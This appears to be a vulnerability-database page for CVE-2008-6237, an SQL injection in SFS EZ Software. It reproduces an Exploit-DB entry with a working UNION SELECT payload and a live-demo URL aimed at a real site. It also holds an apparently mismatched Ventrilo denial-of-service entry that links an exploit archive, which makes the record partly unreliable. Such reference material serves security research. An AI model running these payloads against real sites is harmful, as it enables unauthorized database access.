CVE-2008-6237
Published 2009-02-23
Priority: P341 | Severity: high | CVSS 2.0 score: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.00% (58.4th percentile)
SQL injection vulnerability in software-description.php in Scripts For Sites (SFS) Hotscripts-like Site allows remote attackers to execute arbitrary SQL commands via the id parameter.
No detection rules found.
Exploit-DB
SFS EZ Software - 'id' SQL Injection
exploitdb·2008-10-31
CVE-2008-6237 SFS EZ Software - 'id' SQL Injection
---
Application : SFS EZ Software
Risk : High
Found By: x0r
Exploit: software/software-description.php?id=-5 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Live Demo:
http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
-=EOF=-
# milw0rm.com [2008-10-31]
Exploit-DB
Ventrilo 3.0.2 - Null Pointer Remote Denial of Service
exploitdb·2008-08-13
CVE-2008-3680 Ventrilo 3.0.2 - Null Pointer Remote Denial of Service
---
NULL pointer in Ventrilo 3.0.2
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6237.zip (2008-ventrilobotomy.zip)
# milw0rm.com [2008-08-13]
No writeups or analysis indexed.